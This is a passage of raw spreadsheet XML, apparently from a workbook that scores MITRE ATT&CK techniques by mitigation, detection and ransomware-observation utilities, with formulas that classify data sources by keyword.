      <c r="AA514" s="37"/>
      <c r="AB514" s="37"/>
      <c r="AC514" s="37"/>
      <c r="AD514" s="50" t="s">
        <v>3818</v>
      </c>
      <c r="AE514" s="37" t="str" cm="1">
        <f t="array" ref="AE514">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD514)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF514" s="37">
        <v>510</v>
      </c>
      <c r="AG514" s="37" t="str" cm="1">
        <f t="array" ref="AG514">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD514)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH514" s="37">
        <v>510</v>
      </c>
      <c r="AI514" s="37" t="str" cm="1">
        <f t="array" ref="AI514">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD514)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ514" s="37">
        <v>510</v>
      </c>
      <c r="AK514" s="37" t="str" cm="1">
        <f t="array" ref="AK514">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD514)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL514" s="37">
        <v>510</v>
      </c>
      <c r="AM514" s="37" t="str" cm="1">
        <f t="array" ref="AM514">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD514)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN514" s="37"/>
      <c r="AO514" s="37"/>
      <c r="AP514" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ514" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>68.033333333333346</v>
      </c>
      <c r="AR514" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS514" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT514" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU51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15" spans="1:47" ht="51">
      <c r="A515" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B515" s="37">
        <f t="shared" si="7"/>
        <v>438.21448047619054</v>
      </c>
      <c r="C515" s="37" t="s">
        <v>1787</v>
      </c>
      <c r="D515" s="50" t="s">
        <v>1788</v>
      </c>
      <c r="E515" s="37"/>
      <c r="F515" s="37">
        <v>1</v>
      </c>
      <c r="G515" s="37">
        <v>1</v>
      </c>
      <c r="H515" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I515" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J515" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K515" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L515" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M515" s="37">
        <v>0</v>
      </c>
      <c r="N515" s="56">
        <v>0</v>
      </c>
      <c r="O515" s="56">
        <v>0</v>
      </c>
      <c r="P515" s="56">
        <v>0</v>
      </c>
      <c r="Q515" s="56">
        <v>0</v>
      </c>
      <c r="R515" s="57" t="s">
        <v>1163</v>
      </c>
      <c r="S515" s="57">
        <v>7</v>
      </c>
      <c r="T515" s="57" t="s">
        <v>1789</v>
      </c>
      <c r="U515" s="57">
        <v>5</v>
      </c>
      <c r="V515" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.11428580952380953</v>
      </c>
      <c r="W515" s="37">
        <v>12</v>
      </c>
      <c r="X515" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Y515" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Z515" s="37">
        <v>0</v>
      </c>
      <c r="AA515" s="37">
        <v>0</v>
      </c>
      <c r="AB515" s="37">
        <v>0</v>
      </c>
      <c r="AC515" s="37"/>
      <c r="AD515" s="50" t="s">
        <v>1790</v>
      </c>
      <c r="AE515" s="37" t="str" cm="1">
        <f t="array" ref="AE515">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD515)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF515" s="37">
        <v>511</v>
      </c>
      <c r="AG515" s="37" t="str" cm="1">
        <f t="array" ref="AG515">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD515)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH515" s="37">
        <v>511</v>
      </c>
      <c r="AI515" s="37" t="str" cm="1">
        <f t="array" ref="AI515">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD515)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ515" s="37">
        <v>511</v>
      </c>
      <c r="AK515" s="37" t="str" cm="1">
        <f t="array" ref="AK515">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD515)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL515" s="37">
        <v>511</v>
      </c>
      <c r="AM515" s="37" t="str" cm="1">
        <f t="array" ref="AM515">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD515)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN515" s="37">
        <v>0</v>
      </c>
      <c r="AO515" s="37">
        <v>0</v>
      </c>
      <c r="AP515" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ515" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>146.07149349206352</v>
      </c>
      <c r="AR515" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS515" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT515" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU51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16" spans="1:47" ht="68">
      <c r="A516" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B516" s="37">
        <f t="shared" si="7"/>
        <v>102.45</v>
      </c>
      <c r="C516" s="37" t="s">
        <v>1791</v>
      </c>
      <c r="D516" s="50" t="s">
        <v>1792</v>
      </c>
      <c r="E516" s="37"/>
      <c r="F516" s="37">
        <v>0</v>
      </c>
      <c r="G516" s="37">
        <v>1</v>
      </c>
      <c r="H516" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I516" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J516" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K516" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L516" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M516" s="37">
        <v>0</v>
      </c>
      <c r="N516" s="56">
        <v>0</v>
      </c>
      <c r="O516" s="56">
        <v>0</v>
      </c>
      <c r="P516" s="56">
        <v>0</v>
      </c>
      <c r="Q516" s="56">
        <v>0</v>
      </c>
      <c r="R516" s="57"/>
      <c r="S516" s="57">
        <v>0</v>
      </c>
      <c r="T516" s="57"/>
      <c r="U516" s="57">
        <v>0</v>
      </c>
      <c r="V516" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W516" s="37">
        <v>0</v>
      </c>
      <c r="X516" s="37">
        <v>0</v>
      </c>
      <c r="Y516" s="37">
        <v>0</v>
      </c>
      <c r="Z516" s="37">
        <v>0</v>
      </c>
      <c r="AA516" s="37">
        <v>0</v>
      </c>
      <c r="AB516" s="37">
        <v>0</v>
      </c>
      <c r="AC516" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD516" s="50" t="s">
        <v>1793</v>
      </c>
      <c r="AE516" s="37" t="str" cm="1">
        <f t="array" ref="AE516">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD516)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF516" s="37">
        <v>512</v>
      </c>
      <c r="AG516" s="37" t="str" cm="1">
        <f t="array" ref="AG516">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD516)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH516" s="37">
        <v>512</v>
      </c>
      <c r="AI516" s="37" t="str" cm="1">
        <f t="array" ref="AI516">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD516)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ516" s="37">
        <v>512</v>
      </c>
      <c r="AK516" s="37" t="str" cm="1">
        <f t="array" ref="AK516">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD516)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL516" s="37">
        <v>512</v>
      </c>
      <c r="AM516" s="37" t="str" cm="1">
        <f t="array" ref="AM516">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD516)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN516" s="37">
        <v>0</v>
      </c>
      <c r="AO516" s="37">
        <v>1</v>
      </c>
      <c r="AP516" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ516" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>34.15</v>
      </c>
      <c r="AR516" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS516" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT516" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU51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0.83690476190476182</v>
      </c>
    </row>
    <row r="517" spans="1:47" ht="34">
      <c r="A517" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B517" s="37">
        <f t="shared" ref="B517:B580" si="8">SUM(H517,M517,V517)*(1+SUM(AF517,AH517,AJ517,AL517,AN517))</f>
        <v>102.65</v>
      </c>
      <c r="C517" s="37" t="s">
        <v>1794</v>
      </c>
      <c r="D517" s="50" t="s">
        <v>1792</v>
      </c>
      <c r="E517" s="37" t="s">
        <v>1795</v>
      </c>
      <c r="F517" s="37">
        <v>0</v>
      </c>
      <c r="G517" s="37">
        <v>1</v>
      </c>
      <c r="H517" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I517" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J517" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K517" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L517" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M517" s="37">
        <v>0</v>
      </c>
      <c r="N517" s="56">
        <v>0</v>
      </c>
      <c r="O517" s="56">
        <v>0</v>
      </c>
      <c r="P517" s="56">
        <v>0</v>
      </c>
      <c r="Q517" s="56">
        <v>0</v>
      </c>
      <c r="R517" s="57"/>
      <c r="S517" s="57">
        <v>0</v>
      </c>
      <c r="T517" s="57"/>
      <c r="U517" s="57">
        <v>0</v>
      </c>
      <c r="V517" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W517" s="37">
        <v>0</v>
      </c>
      <c r="X517" s="37">
        <v>0</v>
      </c>
      <c r="Y517" s="37">
        <v>0</v>
      </c>
      <c r="Z517" s="37">
        <v>0</v>
      </c>
      <c r="AA517" s="37">
        <v>0</v>
      </c>
      <c r="AB517" s="37">
        <v>0</v>
      </c>
      <c r="AC517" s="37"/>
      <c r="AD517" s="50" t="s">
        <v>1796</v>
      </c>
      <c r="AE517" s="37" t="str" cm="1">
        <f t="array" ref="AE517">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD517)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF517" s="37">
        <v>513</v>
      </c>
      <c r="AG517" s="37" t="str" cm="1">
        <f t="array" ref="AG517">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD517)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH517" s="37">
        <v>513</v>
      </c>
      <c r="AI517" s="37" t="str" cm="1">
        <f t="array" ref="AI517">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD517)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ517" s="37">
        <v>513</v>
      </c>
      <c r="AK517" s="37" t="str" cm="1">
        <f t="array" ref="AK517">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD517)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL517" s="37">
        <v>513</v>
      </c>
      <c r="AM517" s="37" t="str" cm="1">
        <f t="array" ref="AM517">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD517)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN517" s="37">
        <v>0</v>
      </c>
      <c r="AO517" s="37">
        <v>0</v>
      </c>
      <c r="AP517" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ517" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>34.216666666666669</v>
      </c>
      <c r="AR517" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS517" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT517" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU51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18" spans="1:47" ht="17">
      <c r="A518" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B518" s="37">
        <f t="shared" si="8"/>
        <v>102.85000000000001</v>
      </c>
      <c r="C518" s="37" t="s">
        <v>1797</v>
      </c>
      <c r="D518" s="50" t="s">
        <v>1792</v>
      </c>
      <c r="E518" s="37" t="s">
        <v>1798</v>
      </c>
      <c r="F518" s="37">
        <v>0</v>
      </c>
      <c r="G518" s="37">
        <v>1</v>
      </c>
      <c r="H518" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I518" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J518" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K518" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L518" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M518" s="37">
        <v>0</v>
      </c>
      <c r="N518" s="56">
        <v>0</v>
      </c>
      <c r="O518" s="56">
        <v>0</v>
      </c>
      <c r="P518" s="56">
        <v>0</v>
      </c>
      <c r="Q518" s="56">
        <v>0</v>
      </c>
      <c r="R518" s="57"/>
      <c r="S518" s="57">
        <v>0</v>
      </c>
      <c r="T518" s="57"/>
      <c r="U518" s="57">
        <v>0</v>
      </c>
      <c r="V518" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W518" s="37">
        <v>0</v>
      </c>
      <c r="X518" s="37">
        <v>0</v>
      </c>
      <c r="Y518" s="37">
        <v>0</v>
      </c>
      <c r="Z518" s="37">
        <v>0</v>
      </c>
      <c r="AA518" s="37">
        <v>0</v>
      </c>
      <c r="AB518" s="37">
        <v>0</v>
      </c>
      <c r="AC518" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD518" s="50"/>
      <c r="AE518" s="37" t="str" cm="1">
        <f t="array" ref="AE518">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD518)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF518" s="37">
        <v>514</v>
      </c>
      <c r="AG518" s="37" t="str" cm="1">
        <f t="array" ref="AG518">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD518)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH518" s="37">
        <v>514</v>
      </c>
      <c r="AI518" s="37" t="str" cm="1">
        <f t="array" ref="AI518">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD518)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ518" s="37">
        <v>514</v>
      </c>
      <c r="AK518" s="37" t="str" cm="1">
        <f t="array" ref="AK518">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD518)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL518" s="37">
        <v>514</v>
      </c>
      <c r="AM518" s="37" t="str" cm="1">
        <f t="array" ref="AM518">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD518)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN518" s="37">
        <v>0</v>
      </c>
      <c r="AO518" s="37">
        <v>0</v>
      </c>
      <c r="AP518" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ518" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>34.283333333333339</v>
      </c>
      <c r="AR518" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS518" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT518" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU51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19" spans="1:47" ht="34">
      <c r="A519" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B519" s="37">
        <f t="shared" si="8"/>
        <v>103.05000000000001</v>
      </c>
      <c r="C519" s="37" t="s">
        <v>1799</v>
      </c>
      <c r="D519" s="50" t="s">
        <v>1792</v>
      </c>
      <c r="E519" s="37" t="s">
        <v>1800</v>
      </c>
      <c r="F519" s="37">
        <v>0</v>
      </c>
      <c r="G519" s="37">
        <v>1</v>
      </c>
      <c r="H519" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I519" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J519" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K519" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L519" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M519" s="37">
        <v>0</v>
      </c>
      <c r="N519" s="56">
        <v>0</v>
      </c>
      <c r="O519" s="56">
        <v>0</v>
      </c>
      <c r="P519" s="56">
        <v>0</v>
      </c>
      <c r="Q519" s="56">
        <v>0</v>
      </c>
      <c r="R519" s="57"/>
      <c r="S519" s="57">
        <v>0</v>
      </c>
      <c r="T519" s="57"/>
      <c r="U519" s="57">
        <v>0</v>
      </c>
      <c r="V519" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W519" s="37">
        <v>0</v>
      </c>
      <c r="X519" s="37">
        <v>0</v>
      </c>
      <c r="Y519" s="37">
        <v>0</v>
      </c>
      <c r="Z519" s="37">
        <v>0</v>
      </c>
      <c r="AA519" s="37">
        <v>0</v>
      </c>
      <c r="AB519" s="37">
        <v>0</v>
      </c>
      <c r="AC519" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD519" s="50" t="s">
        <v>1801</v>
      </c>
      <c r="AE519" s="37" t="str" cm="1">
        <f t="array" ref="AE519">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD519)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF519" s="37">
        <v>515</v>
      </c>
      <c r="AG519" s="37" t="str" cm="1">
        <f t="array" ref="AG519">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD519)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH519" s="37">
        <v>515</v>
      </c>
      <c r="AI519" s="37" t="str" cm="1">
        <f t="array" ref="AI519">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD519)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ519" s="37">
        <v>515</v>
      </c>
      <c r="AK519" s="37" t="str" cm="1">
        <f t="array" ref="AK519">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD519)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL519" s="37">
        <v>515</v>
      </c>
      <c r="AM519" s="37" t="str" cm="1">
        <f t="array" ref="AM519">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD519)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN519" s="37">
        <v>0</v>
      </c>
